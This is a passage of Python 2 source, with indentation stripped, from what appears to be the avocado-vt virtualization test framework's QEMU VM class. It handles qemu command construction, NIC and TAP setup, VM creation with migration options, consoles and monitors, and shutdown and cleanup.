if not os.path.exists(params['ovmf_path']):
raise exceptions.TestError("The OVMF path is not exist. Maybe you"
" need to install related packages.")
current_data_dir = data_dir.get_data_dir()
ovmf_code_filename = params["ovmf_code_filename"]
ovmf_code_path = os.path.join(params['ovmf_path'],
ovmf_code_filename)
ovmf_vars_filename = params["ovmf_vars_filename"]
ovmf_vars_src_path = os.path.join(params['ovmf_path'],
ovmf_vars_filename)
# To ignore the influence from backends
path = storage.get_image_filename_filesytem(params,
current_data_dir)
ovmf_vars_path = "%s.fd" % path
dev = qdevices.QDrive('ovmf_code', use_device=False)
dev.set_param("if", "pflash")
dev.set_param("format", "raw")
dev.set_param("readonly", "on")
dev.set_param("file", ovmf_code_path)
devices.insert(dev)
if (not os.path.exists(ovmf_vars_path) or
params.get("restore_ovmf_vars") == "yse"):
cp_cmd = "cp -f %s %s" % (ovmf_vars_src_path, ovmf_vars_path)
process.system(cp_cmd)
dev = qdevices.QDrive('ovmf_vars', use_device=False)
dev.set_param("if", "pflash")
dev.set_param("format", "raw")
dev.set_param("file", ovmf_vars_path)
devices.insert(dev)
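# The two pflash drives built above translate to something like
# (illustrative; actual filenames come from the ovmf_* params):
#   -drive if=pflash,format=raw,readonly=on,file=<ovmf_path>/<code>.fd
#   -drive if=pflash,format=raw,file=<image_name>.fd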
disable_kvm_option = ""
if (devices.has_option("no-kvm")):
disable_kvm_option = "-no-kvm"
enable_kvm_option = ""
if (devices.has_option("enable-kvm")):
enable_kvm_option = "-enable-kvm"
if (params.get("disable_kvm", "no") == "yes"):
params["enable_kvm"] = "no"
if (params.get("enable_kvm", "yes") == "no"):
devices.insert(StrDev('nokvm', cmdline=disable_kvm_option))
logging.debug("qemu will run in TCG mode")
else:
devices.insert(StrDev('kvm', cmdline=enable_kvm_option))
logging.debug("qemu will run in KVM mode")
self.no_shutdown = (devices.has_option("no-shutdown") and
params.get("disable_shutdown", "no") == "yes")
if self.no_shutdown:
devices.insert(StrDev('noshutdown', cmdline="-no-shutdown"))
user_runas = params.get("user_runas")
if devices.has_option("runas") and user_runas:
devices.insert(StrDev('runas', cmdline="-runas %s" % user_runas))
if params.get("enable_sga") == "yes":
devices.insert(StrDev('sga', cmdline=add_sga(devices)))
if params.get("smartcard", "no") == "yes":
sc_chardev = params.get("smartcard_chardev")
sc_id = params.get("smartcard_id")
devices.insert(StrDev('smartcard',
cmdline=add_smartcard(sc_chardev, sc_id)))
if params.get("enable_watchdog", "no") == "yes":
cmd = add_watchdog(devices,
params.get("watchdog_device_type", None),
params.get("watchdog_action", "reset"))
devices.insert(StrDev('watchdog', cmdline=cmd))
option_roms = params.get("option_roms")
if option_roms:
cmd = ""
for opt_rom in option_roms.split():
cmd += add_option_rom(devices, opt_rom)
if cmd:
devices.insert(StrDev('ROM', cmdline=cmd))
for balloon_device in params.objects("balloon"):
params_balloon = params.object_params(balloon_device)
balloon_devid = params_balloon.get("balloon_dev_devid")
balloon_bus = None
use_ofmt = params_balloon.get("balloon_use_old_format",
"no") == "yes"
if params_balloon.get("balloon_dev_add_bus") == "yes":
balloon_bus = _get_pci_bus(devices, params, 'balloon', True)
add_balloon(devices, devid=balloon_devid, bus=balloon_bus,
use_old_format=use_ofmt)
# Add qemu options
if params.get("msg_timestamp"):
attr_info = ["timestamp", params["msg_timestamp"], bool]
add_qemu_option(devices, "msg", [attr_info])
if params.get("realtime_mlock"):
attr_info = ["mlock", params["realtime_mlock"], bool]
add_qemu_option(devices, "realtime", [attr_info])
if params.get("keyboard_layout"):
attr_info = [None, params["keyboard_layout"], None]
add_qemu_option(devices, "k", [attr_info])
# Add disable_legacy and disable_modern options
virtio_pci_devices = ["virtio-net-pci", "virtio-blk-pci",
"virtio-scsi-pci", "virtio-balloon-pci",
"virtio-serial-pci", "virtio-rng-pci"]
for device in devices:
dev_type = device.get_param("driver")
# Currently virtio1.0 behaviour on latest RHEL.7.2/RHEL.7.3
# qemu versions is default, we don't need to specify the
# disable-legacy and disable-modern options explicitly.
set_disable_legacy = params.get("set_disable_legacy", "no")
set_disable_modern = params.get("set_disable_modern", "no")
if dev_type in virtio_pci_devices:
if set_disable_legacy == "yes":
add_disable_legacy(devices, device, dev_type)
if set_disable_modern == "yes":
add_disable_modern(devices, device, dev_type)
return devices
def _nic_tap_add_helper(self, nic):
if nic.nettype == 'macvtap':
macvtap_mode = self.params.get("macvtap_mode", "vepa")
nic.tapfds = utils_net.create_and_open_macvtap(nic.ifname,
macvtap_mode,
nic.queues,
nic.netdst,
nic.mac)
else:
nic.tapfds = utils_net.open_tap("/dev/net/tun", nic.ifname,
queues=nic.queues, vnet_hdr=True)
logging.debug("Adding VM %s NIC ifname %s to bridge %s",
self.name, nic.ifname, nic.netdst)
if nic.nettype == 'bridge':
utils_net.add_to_bridge(nic.ifname, nic.netdst)
utils_net.bring_up_ifname(nic.ifname)
def _nic_tap_remove_helper(self, nic):
try:
if nic.nettype == 'macvtap':
logging.info("Remove macvtap ifname %s", nic.ifname)
tap = utils_net.Macvtap(nic.ifname)
tap.delete()
else:
logging.debug("Removing VM %s NIC ifname %s from bridge %s",
self.name, nic.ifname, nic.netdst)
if nic.tapfds:
for i in nic.tapfds.split(':'):
os.close(int(i))
if nic.vhostfds:
for i in nic.vhostfds.split(':'):
os.close(int(i))
if nic.ifname and nic.ifname not in utils_net.get_net_if():
_, br_name = utils_net.find_current_bridge(nic.ifname)
if br_name == nic.netdst:
utils_net.del_from_bridge(nic.ifname, nic.netdst)
except TypeError:
pass
def create_serial_console(self):
"""
Establish a session with the serial console.
The first serial port is treated as the serial console.
Note: requires a version of netcat that supports -U
"""
try:
tmp_serial = self.serial_ports[0]
except IndexError:
raise virt_vm.VMConfigMissingError(self.name, "serial")
log_name = "serial-%s-%s.log" % (tmp_serial, self.name)
self.serial_console_log = os.path.join(utils_misc.get_log_file_dir(),
log_name)
self.serial_console = aexpect.ShellSession(
"nc -U %s" % self.get_serial_console_filename(tmp_serial),
auto_close=False,
output_func=utils_misc.log_line,
output_params=(log_name,),
prompt=self.params.get("shell_prompt", "[\#\$]"))
del tmp_serial
def create_virtio_console(self):
"""
Establish a session with the virtio console.
"""
for port in self.virtio_ports:
if isinstance(port, qemu_virtio_port.VirtioConsole):
logfile = "serial-%s-%s.log" % (port.name, self.name)
socat_cmd = "nc -U %s" % port.hostfile
self.virtio_console = aexpect.ShellSession(
socat_cmd,
auto_close=False,
output_func=utils_misc.log_line,
output_params=(logfile,),
prompt=self.params.get("shell_prompt", "[\#\$]"))
return
if self.virtio_ports:
logging.warning(
"No virtio console created in VM. Virtio ports: %s", self.virtio_ports)
self.virtio_console = None
def update_system_dependent_devs(self):
# Networking
devices = self.devices
params = self.params
redirs = []
for redir_name in params.objects("redirs"):
redir_params = params.object_params(redir_name)
guest_port = int(redir_params.get("guest_port"))
host_port = self.redirs.get(guest_port)
redirs += [(host_port, guest_port)]
for nic in self.virtnet:
nic_params = params.object_params(nic.nic_name)
if nic_params.get('pci_assignable') == "no":
script = nic_params.get("nic_script")
downscript = nic_params.get("nic_downscript")
script_dir = data_dir.get_data_dir()
if script:
script = utils_misc.get_path(script_dir, script)
if downscript:
downscript = utils_misc.get_path(script_dir,
downscript)
# setup nic parameters as needed
# add_netdev if netdev_id not set
nic = self.add_nic(**dict(nic))
# gather set values or None if unset
netdev_id = nic.get('netdev_id')
# don't force conversion; tapfds/vhostfds are optional
# add_nic()/add_net() parameters
if 'tapfds' in nic:
tapfds = nic.tapfds
else:
tapfds = ""
if 'vhostfds' in nic:
vhostfds = nic.vhostfds
else:
vhostfds = ""
ifname = nic.get('ifname')
# specify the number of MSI-X vectors that the card should have;
# this option currently only affects virtio cards
net_params = {'netdev_id': netdev_id,
'vhostfd': vhostfds.split(":")[0],
'vhostfds': vhostfds,
'tapfd': tapfds.split(":")[0],
'tapfds': tapfds,
'ifname': ifname,
}
for i, (host_port, guest_port) in enumerate(redirs):
net_params["host_port%d" % i] = host_port
net_params["guest_port%d" % i] = guest_port
# TODO: Is every NIC a PCI device?
devs = devices.get_by_params({'netdev_id': netdev_id})
if len(devs) > 1:
logging.error("There are %d devices with netdev_id %s."
" This shouldn't happens." % (len(devs),
netdev_id))
devs[0].params.update(net_params)
def update_vga_global_default(self, params, migrate=None):
"""
Update VGA global default settings.
:param params: dict of params used to create the vm
:param migrate: whether the vm is created for incoming migration
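Example::

    # Illustrative: with a 'qxl-vga' display device, a param such
    # as "qxl-vga_ram_size = 67108864" results in the option
    # "-global qxl-vga.ram_size=67108864" being inserted, provided
    # the property shows up in 'qemu -device qxl-vga,?'.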
"""
if not self.devices:
return
vga_mapping = {'VGA-std': 'VGA',
'VGA-cirrus': 'cirrus-vga',
'VGA-qxl': 'qxl-vga',
'qxl': 'qxl',
'VGA-none': None}
for device in self.devices:
if not isinstance(device, qdevices.QStringDevice):
continue
vga_type = vga_mapping.get(device.type)
if not vga_type:
continue
help_cmd = '%s -device %s,\? 2>&1' % (self.qemu_binary, vga_type)
help_info = process.system_output(help_cmd, shell=True,
verbose=False)
for pro in re.findall(r'%s.(\w+)=' % vga_type, help_info):
key = [vga_type.lower(), pro]
if migrate:
key.append('dst')
key = '_'.join(key)
val = params.get(key)
if not val:
continue
qdev = qdevices.QGlobal(vga_type, pro, val)
self.devices.insert(qdev)
@error_context.context_aware
def create(self, name=None, params=None, root_dir=None,
timeout=120, migration_mode=None,
migration_exec_cmd=None, migration_fd=None,
mac_source=None):
"""
Start the VM by running a qemu command.
All parameters are optional. If name, params or root_dir are not
supplied, the respective values stored as class attributes are used.
:param name: The name of the object
:param params: A dict containing VM params
:param root_dir: Base directory for relative filenames
:param migration_mode: If supplied, start VM for incoming migration
using this protocol (one of 'rdma', 'x-rdma', 'tcp', 'unix',
'exec' or 'fd')
:param migration_exec_cmd: Command to embed in '-incoming "exec: ..."'
(e.g. 'gzip -c -d filename') if migration_mode is 'exec';
default is to listen on a random TCP port
:param migration_fd: Open file descriptor from which the machine
should migrate.
:param mac_source: A VM object from which to copy MAC addresses. If not
specified, new addresses will be generated.
:raise VMCreateError: If qemu terminates unexpectedly
:raise VMKVMInitError: If KVM initialization fails
:raise VMHugePageError: If hugepage initialization fails
:raise VMImageMissingError: If a CD image is missing
:raise VMHashMismatchError: If a CD image hash doesn't match the
expected hash
:raise VMBadPATypeError: If an unsupported PCI assignment type is
requested
:raise VMPAError: If no PCI assignable devices could be assigned
:raise TAPCreationError: If a tap fd cannot be created
:raise BRAddIfError: If a tap cannot be added to a bridge
:raise TAPBringUpError: If a tap cannot be brought up
:raise PrivateBridgeError: If the private bridge cannot be brought up
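Example::

    # Illustrative usage from a test; 'vm' is obtained from the
    # test environment and params are provided by the framework
    vm.create(timeout=240)
    session = vm.wait_for_login()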
"""
error_context.context("creating '%s'" % self.name)
self.destroy(free_mac_addresses=False)
if name is not None:
self.name = name
self.devices = None # Representation changed
if params is not None:
self.params = params
self.devices = None # Representation changed
if root_dir is not None:
self.root_dir = root_dir
self.devices = None # Representation changed
name = self.name
params = self.params
root_dir = self.root_dir
# Verify the md5sum of the ISO images
for cdrom in params.objects("cdroms"):
cdrom_params = params.object_params(cdrom)
if cdrom_params.get("enable_gluster") == "yes":
continue
if cdrom_params.get("enable_ceph") == "yes":
continue
iso = cdrom_params.get("cdrom")
if iso:
iso = utils_misc.get_path(data_dir.get_data_dir(), iso)
if not os.path.exists(iso):
raise virt_vm.VMImageMissingError(iso)
compare = False
if cdrom_params.get("skip_hash", "no") == "yes":
logging.debug("Skipping hash comparison")
elif cdrom_params.get("md5sum_1m"):
logging.debug("Comparing expected MD5 sum with MD5 sum of "
"first MB of ISO file...")
actual_hash = crypto.hash_file(iso, 1048576,
algorithm="md5")
expected_hash = cdrom_params.get("md5sum_1m")
compare = True
elif cdrom_params.get("md5sum"):
logging.debug("Comparing expected MD5 sum with MD5 sum of "
"ISO file...")
actual_hash = crypto.hash_file(iso, algorithm="md5")
expected_hash = cdrom_params.get("md5sum")
compare = True
elif cdrom_params.get("sha1sum"):
logging.debug("Comparing expected SHA1 sum with SHA1 sum "
"of ISO file...")
actual_hash = crypto.hash_file(iso, algorithm="sha1")
expected_hash = cdrom_params.get("sha1sum")
compare = True
if compare:
if actual_hash == expected_hash:
logging.debug("Hashes match")
else:
raise virt_vm.VMHashMismatchError(actual_hash,
expected_hash)
# Make sure the following code is not executed by more than one thread
# at the same time
lockfile = open(CREATE_LOCK_FILENAME, "w+")
fcntl.lockf(lockfile, fcntl.LOCK_EX)
try:
# Handle port redirections
redir_names = params.objects("redirs")
host_ports = utils_misc.find_free_ports(
5000, 6000, len(redir_names))
old_redirs = {}
if self.redirs:
old_redirs = self.redirs
self.redirs = {}
for i in range(len(redir_names)):
redir_params = params.object_params(redir_names[i])
guest_port = int(redir_params.get("guest_port"))
self.redirs[guest_port] = host_ports[i]
if self.redirs != old_redirs:
self.devices = None
# Update the network related parameters as well to conform to
# expected behavior on VM creation
getattr(self, 'virtnet').__init__(self.params,
self.name,
self.instance)
# Generate basic parameter values for all NICs and create TAP fd
for nic in self.virtnet:
nic_params = params.object_params(nic.nic_name)
pa_type = nic_params.get("pci_assignable")
if pa_type and pa_type != "no":
device_driver = nic_params.get("device_driver",
"pci-assign")
if "mac" not in nic:
self.virtnet.generate_mac_address(nic["nic_name"])
mac = nic["mac"]
if self.pci_assignable is None:
self.pci_assignable = test_setup.PciAssignable(
driver=params.get("driver"),
driver_option=params.get("driver_option"),
host_set_flag=params.get("host_setup_flag"),
kvm_params=params.get("kvm_default"),
vf_filter_re=params.get("vf_filter_re"),
pf_filter_re=params.get("pf_filter_re"),
device_driver=device_driver,
nic_name_re=params.get("nic_name_re"))
# Virtual Functions (VF) assignable devices
if pa_type == "vf":
self.pci_assignable.add_device(device_type=pa_type,
mac=mac,
name=nic_params.get("device_name"))
# Physical NIC (PF) assignable devices
elif pa_type == "pf":
self.pci_assignable.add_device(device_type=pa_type,
name=nic_params.get("device_name"))
else:
raise virt_vm.VMBadPATypeError(pa_type)
else:
# fill in key values, validate nettype
# note: make_create_command() calls vm.add_nic (i.e. on a
# copy)
if nic_params.get('netdst') == 'private':
nic.netdst = (test_setup.
PrivateBridgeConfig(nic_params).brname)
nic = self.add_nic(**dict(nic)) # implied add_netdev
if mac_source:
# Will raise exception if source doesn't
# have corresponding nic
logging.debug("Copying mac for nic %s from VM %s"
% (nic.nic_name, mac_source.name))
nic.mac = mac_source.get_mac_address(nic.nic_name)
if nic.ifname in utils_net.get_net_if():
self.virtnet.generate_ifname(nic.nic_name)
elif (utils_net.find_current_bridge(nic.ifname)[1] ==
nic.netdst):
utils_net.del_from_bridge(nic.ifname, nic.netdst)
if nic.nettype in ['bridge', 'network', 'macvtap']:
self._nic_tap_add_helper(nic)
if ((nic_params.get("vhost") in ['on',
'force',
'vhost=on']) and
(nic_params.get("enable_vhostfd", "yes") == "yes")):
vhostfds = []
for i in xrange(int(nic.queues)):
vhostfds.append(str(os.open("/dev/vhost-net",
os.O_RDWR)))
nic.vhostfds = ':'.join(vhostfds)
elif nic.nettype == 'user':
logging.info("Assuming dependencies met for "
"user mode nic %s, and ready to go"
% nic.nic_name)
# Update the fd and vhostfd for nic devices
if self.devices is not None:
for device in self.devices:
cmd = device.cmdline()
if cmd is not None and "fd=" in cmd:
new_cmd = ""
for opt in cmd.split(","):
if re.match('fd=', opt):
opt = 'fd=%s' % nic.tapfds
if re.match('vhostfd=', opt):
opt = 'vhostfd=%s' % nic.vhostfds
new_cmd += "%s," % opt
device._cmdline = new_cmd.rstrip(",")
self.virtnet.update_db()
# Find available VNC port, if needed
if params.get("display") == "vnc":
self.vnc_port = utils_misc.find_free_port(5900, 6100)
# Find random UUID if specified 'uuid = random' in config file
if params.get("uuid") == "random":
f = open("/proc/sys/kernel/random/uuid")
self.uuid = f.read().strip()
f.close()
if self.pci_assignable is not None:
self.pa_pci_ids = self.pci_assignable.request_devs()
if self.pa_pci_ids:
logging.debug("Successfully assigned devices: %s",
self.pa_pci_ids)
else:
raise virt_vm.VMPAError(pa_type)
if (name is None and params is None and root_dir is None and
self.devices is not None):
self.update_system_dependent_devs()
# Make qemu command
try:
self.devices = self.make_create_command()
self.update_vga_global_default(params, migration_mode)
logging.debug(self.devices.str_short())
logging.debug(self.devices.str_bus_short())
qemu_command = self.devices.cmdline()
except exceptions.TestSkipError:
# TestSkipErrors should be kept as-is so we generate SKIP
# results instead of bogus FAIL results
raise
except Exception:
for nic in self.virtnet:
self._nic_tap_remove_helper(nic)
utils_misc.log_last_traceback('Fail to create qemu command:')
raise virt_vm.VMStartError(self.name, 'Error occurred while '
'executing make_create_command(). '
'Check the log for traceback.')
# Add migration parameters if required
if migration_mode in ["tcp", "rdma", "x-rdma"]:
self.migration_port = utils_misc.find_free_port(5200, 6000)
qemu_command += (" -incoming " + migration_mode +
":0:%d" % self.migration_port)
elif migration_mode == "unix":
self.migration_file = os.path.join(data_dir.get_tmp_dir(),
"migration-unix-%s" %
self.instance)
qemu_command += " -incoming unix:%s" % self.migration_file
elif migration_mode == "exec":
if migration_exec_cmd is None:
self.migration_port = utils_misc.find_free_port(5200, 6000)
qemu_command += (' -incoming "exec:nc -l %s"' %
self.migration_port)
else:
qemu_command += (' -incoming "exec:%s"' %
migration_exec_cmd)
elif migration_mode == "fd":
qemu_command += ' -incoming "fd:%d"' % (migration_fd)
p9_fs_driver = params.get("9p_fs_driver")
if p9_fs_driver == "proxy":
proxy_helper_name = params.get("9p_proxy_binary",
"virtfs-proxy-helper")
proxy_helper_cmd = utils_misc.get_path(root_dir,
proxy_helper_name)
if not proxy_helper_cmd:
raise virt_vm.VMConfigMissingError(self.name,
"9p_proxy_binary")
p9_export_dir = params.get("9p_export_dir")
if not p9_export_dir:
raise virt_vm.VMConfigMissingError(self.name,
"9p_export_dir")
proxy_helper_cmd += " -p " + p9_export_dir
proxy_helper_cmd += " -u 0 -g 0"
p9_socket_name = params.get("9p_socket_name")
proxy_helper_cmd += " -s " + p9_socket_name
proxy_helper_cmd += " -n"
logging.info("Running Proxy Helper:\n%s", proxy_helper_cmd)
self.process = aexpect.run_tail(proxy_helper_cmd,
None,
logging.info,
"[9p proxy helper]",
auto_close=False)
else:
logging.info("Running qemu command (reformatted):\n%s",
qemu_command.replace(" -", " \\\n -"))
self.qemu_command = qemu_command
self.process = aexpect.run_tail(qemu_command,
None,
logging.info,
"[qemu output] ",
auto_close=False)
logging.info("Created qemu process with parent PID %d",
self.process.get_pid())
self.start_time = time.time()
self.start_monotonic_time = utils_misc.monotonic_time()
# the test doesn't need to hold the tapfds open
for nic in self.virtnet:
if 'tapfds' in nic: # implies bridge/tap
try:
for i in nic.tapfds.split(':'):
os.close(int(i))
# qemu process retains access via open file
# remove this attribute from virtnet because
# fd numbers are not always predictable and
# vm instance must support cloning.
del nic['tapfds']
# File descriptor is already closed
except OSError:
pass
if 'vhostfds' in nic:
try:
for i in nic.vhostfds.split(':'):
os.close(int(i))
del nic['vhostfds']
except OSError:
pass
# Make sure qemu is not defunct
if self.process.is_defunct():
logging.error("Bad things happened, qemu process is defunct")
err = ("Qemu is defunct.\nQemu output:\n%s"
% self.process.get_output())
self.destroy()
raise virt_vm.VMStartError(self.name, err)
# Make sure the process was started successfully
if not self.process.is_alive():
status = self.process.get_status()
output = self.process.get_output().strip()
migration_in_course = migration_mode is not None
unknown_protocol = "unknown migration protocol" in output
if migration_in_course and unknown_protocol:
e = VMMigrateProtoUnsupportedError(migration_mode, output)
else:
e = virt_vm.VMCreateError(qemu_command, status, output)
self.destroy()
raise e
# Establish monitor connections
self.monitors = []
for m_name in params.objects("monitors"):
m_params = params.object_params(m_name)
if m_params.get("debugonly", "no") == "yes":
continue
try:
monitor = qemu_monitor.wait_for_create_monitor(self,
m_name,
m_params,
timeout)
except qemu_monitor.MonitorConnectError, detail:
logging.error(detail)
self.destroy()
raise
# Add this monitor to the list
self.monitors.append(monitor)
# Create serial ports.
for serial in params.objects("serials"):
self.serial_ports.append(serial)
# Create virtio_ports (virtio_serialports and virtio_consoles)
i = 0
self.virtio_ports = []
for port in params.objects("virtio_ports"):
port_params = params.object_params(port)
if port_params.get('virtio_port_chardev') == "spicevmc":
filename = 'dev%s' % port
else:
filename = self.get_virtio_port_filename(port)
port_name = port_params.get('virtio_port_name_prefix', None)
if port_name: # If port_name_prefix was used
port_name = port_name + str(i)
else: # Implicit name - port
port_name = port
if port_params.get('virtio_port_type') in ("console",
"virtio_console"):
self.virtio_ports.append(
qemu_virtio_port.VirtioConsole(port, port_name,
filename))
else:
self.virtio_ports.append(
qemu_virtio_port.VirtioSerial(port, port_name,
filename))
i += 1
self.create_virtio_console()
# Get the output so far, to see if we have any problems with
# KVM modules or with hugepage setup.
output = self.process.get_output()
if re.search("Could not initialize KVM", output, re.IGNORECASE):
e = virt_vm.VMKVMInitError(
qemu_command, self.process.get_output())
self.destroy()
raise e
if "alloc_mem_area" in output:
e = virt_vm.VMHugePageError(
qemu_command, self.process.get_output())
self.destroy()
raise e
logging.debug("VM appears to be alive with PID %s", self.get_pid())
vcpu_thread_pattern = self.params.get("vcpu_thread_pattern",
r"thread_id.?[:|=]\s*(\d+)")
self.vcpu_threads = self.get_vcpu_pids(vcpu_thread_pattern)
vhost_thread_pattern = params.get("vhost_thread_pattern",
r"\w+\s+(\d+)\s.*\[vhost-%s\]")
self.vhost_threads = self.get_vhost_threads(vhost_thread_pattern)
self.create_serial_console()
for key, value in self.logs.items():
outfile = "%s-%s.log" % (key, name)
self.logsessions[key] = aexpect.Tail(
"nc -U %s" % value,
auto_close=False,
output_func=utils_misc.log_line,
output_params=(outfile,))
self.logsessions[key].set_log_file(outfile)
if params.get("paused_after_start_vm") != "yes":
# start guest
if self.monitor.verify_status("paused"):
try:
self.monitor.cmd("cont")
except qemu_monitor.QMPCmdError, e:
if ((e.data['class'] == "MigrationExpected") and
(migration_mode is not None)):
logging.debug("Migration did not start yet...")
else:
raise e
# Update mac and IP info for assigned device
# NeedFix: Can we find another way to get guest ip?
if params.get("mac_changeable") == "yes":
utils_net.update_mac_ip_address(self, params)
finally:
fcntl.lockf(lockfile, fcntl.LOCK_UN)
lockfile.close()
def wait_for_status(self, status, timeout, first=0.0, step=1.0, text=None):
"""
Wait until the VM status changes to the specified status
:param status: the status to wait for
:param timeout: Timeout in seconds
:param first: Time to sleep before first attempt
:param step: Time to sleep between attempts in seconds
:param text: Text to print while waiting, for debug purposes
:return: True in case the status has changed before timeout, otherwise
return None.
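Example::

    # Illustrative: wait up to 30 seconds for the guest to pause
    vm.wait_for_status("paused", timeout=30)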
"""
return utils_misc.wait_for(lambda: self.monitor.verify_status(status),
timeout, first, step, text)
def wait_until_paused(self, timeout):
"""
Wait until the VM is paused.
:param timeout: Timeout in seconds.
:return: True in case the VM is paused before timeout, otherwise
return None.
"""
return self.wait_for_status("paused", timeout)
def wait_until_dead(self, timeout, first=0.0, step=1.0):
"""
Wait until VM is dead.
:return: True if VM is dead before timeout, otherwise returns None.
:param timeout: Timeout in seconds
:param first: Time to sleep before first attempt
:param step: Time to sleep between attempts in seconds
"""
return utils_misc.wait_for(self.is_dead, timeout, first, step)
def wait_for_shutdown(self, timeout=60):
"""
Wait until the VM is shut down by the guest.
:return: True in case the VM was shut down, None otherwise.
Note that the VM is not necessarily dead when this function returns
True. If QEMU is running in -no-shutdown mode, the QEMU process
may be still alive.
"""
if self.no_shutdown:
return self.wait_until_paused(timeout)
else:
return self.wait_until_dead(timeout, 1, 1)
def graceful_shutdown(self, timeout=60):
"""
Try to gracefully shut down the VM.
:return: True if VM was successfully shut down, None otherwise.
Note that the VM is not necessarily dead when this function returns
True. If QEMU is running in -no-shutdown mode, the QEMU process
may be still alive.
"""
def _shutdown_by_sendline():
try:
session.sendline(self.params.get("shutdown_command"))
if self.wait_for_shutdown(timeout):
return True
finally:
session.close()
if self.params.get("shutdown_command"):
# Try to destroy with shell command
logging.debug("Shutting down VM %s (shell)", self.name)
try:
if len(self.virtnet) > 0:
session = self.login()
else:
session = self.serial_login()
except (IndexError), e:
try:
session = self.serial_login()
except (remote.LoginError, virt_vm.VMError), e:
logging.debug(e)
else:
# Successfully get session by serial_login()
_shutdown_by_sendline()
except (remote.LoginError, virt_vm.VMError), e:
logging.debug(e)
else:
# No exception occurred
_shutdown_by_sendline()
def _cleanup(self, free_mac_addresses):
"""
Do cleanup work:
- remove VM monitor files
- close the qemu process
- close the serial/virtio consoles
- close the log sessions
- delete tmp files
- free mac addresses, if needed
- delete macvtap, if needed
:param free_mac_addresses: Whether to release the VM's NICs back
to the address pool.
"""
self.monitors = []
if self.pci_assignable:
self.pci_assignable.release_devs()
self.pci_assignable = None
if self.process:
self.process.close()
self.cleanup_serial_console()
if self.logsessions:
for key in self.logsessions:
self.logsessions[key].close()
# Generate the tmp file which should be deleted.
file_list = [self.get_testlog_filename()]
file_list += qemu_monitor.get_monitor_filenames(self)
file_list += self.get_virtio_port_filenames()
file_list += self.get_serial_console_filenames()
file_list += self.logs.values()
for f in file_list:
try:
if f:
os.unlink(f)
except OSError:
pass
if hasattr(self, "migration_file"):
try:
os.unlink(self.migration_file)
except OSError:
pass
if free_mac_addresses:
for nic_index in xrange(0, len(self.virtnet)):
self.free_mac_address(nic_index)
for nic in self.virtnet:
if nic.nettype == 'macvtap':
tap = utils_net.Macvtap(nic.ifname)
tap.delete()
elif nic.ifname and nic.ifname not in utils_net.get_net_if():
_, br_name = utils_net.find_current_bridge(nic.ifname)
if br_name == nic.netdst:
utils_net.del_from_bridge(nic.ifname, nic.netdst)
def destroy(self, gracefully=True, free_mac_addresses=True):
"""
Destroy the VM.
If gracefully is True, first attempt to shutdown the VM with a shell
command. Then, attempt to destroy the VM via the monitor with a 'quit'
command. If that fails, send SIGKILL to the qemu process.
:param gracefully: If True, an attempt will be made to end the VM
using a shell command before trying to end the qemu process
with a 'quit' or a kill signal.
:param free_mac_addresses: If True, the MAC addresses used by the VM
will be freed.
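Example::

    # Illustrative: power off forcibly, keeping the MAC addresses
    # for a subsequent re-create
    vm.destroy(gracefully=False, free_mac_addresses=False)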
"""
try:
# Is it already dead?
if self.is_dead():
return
logging.debug("Destroying VM %s (PID %s)", self.name,
self.get_pid())
kill_timeout = int(self.params.get("kill_timeout", "60"))
if gracefully:
self.graceful_shutdown(kill_timeout)
if self.is_dead():
logging.debug("VM %s down (shell)", self.name)
return
else:
logging.debug("VM %s failed to go down (shell)", self.name)
if self.monitor:
# Try to finish process with a monitor command
logging.debug("Ending VM %s process (monitor)", self.name)
try:
self.monitor.quit()
except Exception, e:
logging.warn(e)
if self.is_dead():
logging.warn("VM %s down during try to kill it "
"by monitor", self.name)
return
else:
# Wait for the VM to be really dead
if self.wait_until_dead(5, 0.5, 0.5):
logging.debug("VM %s down (monitor)", self.name)
return
else:
logging.debug("VM %s failed to go down (monitor)",
self.name)
# If the VM isn't dead yet...
pid = self.process.get_pid()
logging.debug("Ending VM %s process (killing PID %s)",
self.name, pid)
utils_misc.kill_process_tree(pid, 9)
# Wait for the VM to be really dead
if utils_misc.wait_for(self.is_dead, 5, 0.5, 0.5):
logging.debug("VM %s down (process killed)", self.name)
return
# If all else fails, we've got a zombie...
logging.error("VM %s (PID %s) is a zombie!", self.name,
self.process.get_pid())
finally:
self._cleanup(free_mac_addresses)
@property
def monitor(self):
"""
Return the main monitor object, selected by the parameter main_monitor.
If main_monitor isn't defined or it refers to a nonexistent monitor,
return the first monitor.
If no monitors exist, return None.
"""
for m in self.monitors:
if m.name == self.params.get("main_monitor"):
return m
if self.monitors:
return self.monitors[0]
return None
@property
def catch_monitor(self):
"""
Return the catch monitor object, selected by the parameter
catch_monitor.
If catch_monitor isn't defined or it refers to a nonexistent monitor,
return the last monitor.
If no monitors exist, return None.
"""
for m in self.monitors:
if m.name == self.params.get("catch_monitor"):
return m
if self.monitors:
return self.monitors[-1]
return None
def get_monitors_by_type(self, mon_type):
"""
Return list of monitors of mon_type type.
:param mon_type: desired monitor type (qmp, human)
"""
return [_ for _ in self.monitors if _.protocol == mon_type]
def get_peer(self, netid):
"""
Return the peer of a netdev or network device.
:param netid: id of netdev or device
:return: id of the peer device otherwise None
"""
o = self.monitor.info("network")
network_info = o
if isinstance(o, dict):
network_info = o.get["return"]
netdev_peer_re = self.params.get("netdev_peer_re")
if not netdev_peer_re:
default_netdev_peer_re = "\s{2,}(.*?): .*?\\\s(.*?):"
logging.warning("Missing config netdev_peer_re for VM %s, "
"using default %s", self.name,
default_netdev_peer_re)
netdev_peer_re = default_netdev_peer_re
pairs = re.findall(netdev_peer_re, network_info, re.S)
for nic, tap in pairs:
if nic == netid:
return tap
if tap == netid:
return nic
return None
def get_ifname(self, nic_index=0):
"""
Return the ifname of a bridge/tap device associated with a NIC.
:param nic_index: Index of the NIC
"""
return self.virtnet[nic_index].ifname
def get_pid(self):
"""
Return the VM's PID. If the VM is dead return None.
:note: This works under the assumption that self.process.get_pid()
returns the PID of the parent shell process and that qemu is its
only child.
:return: the PID of the qemu process, or None if the VM is dead.
"""
try:
children = commands.getoutput("ps --ppid=%d -o pid=" %
self.process.get_pid()).split()
return int(children[0])
except (TypeError, IndexError, ValueError):
return None
def get_qemu_threads(self):
"""
Return the list of qemu thread IDs (entries of /proc/<pid>/task)
:return: the list of qemu thread IDs
"""
cmd = "ls /proc/%d/task" % self.get_pid()
status, output = commands.getstatusoutput(cmd)
if status:
return []
return output.split()
def get_shell_pid(self):
"""
Return the PID of the parent shell process.
:note: This works under the assumption that self.process.get_pid()
returns the PID of the parent shell process.
:return: the PID of the parent shell process.
"""
return self.process.get_pid()
def get_vnc_port(self):
"""
Return self.vnc_port.
"""
return self.vnc_port
def get_vcpu_pids(self, vcpu_thread_pattern):
"""
Return the list of vcpu PIDs
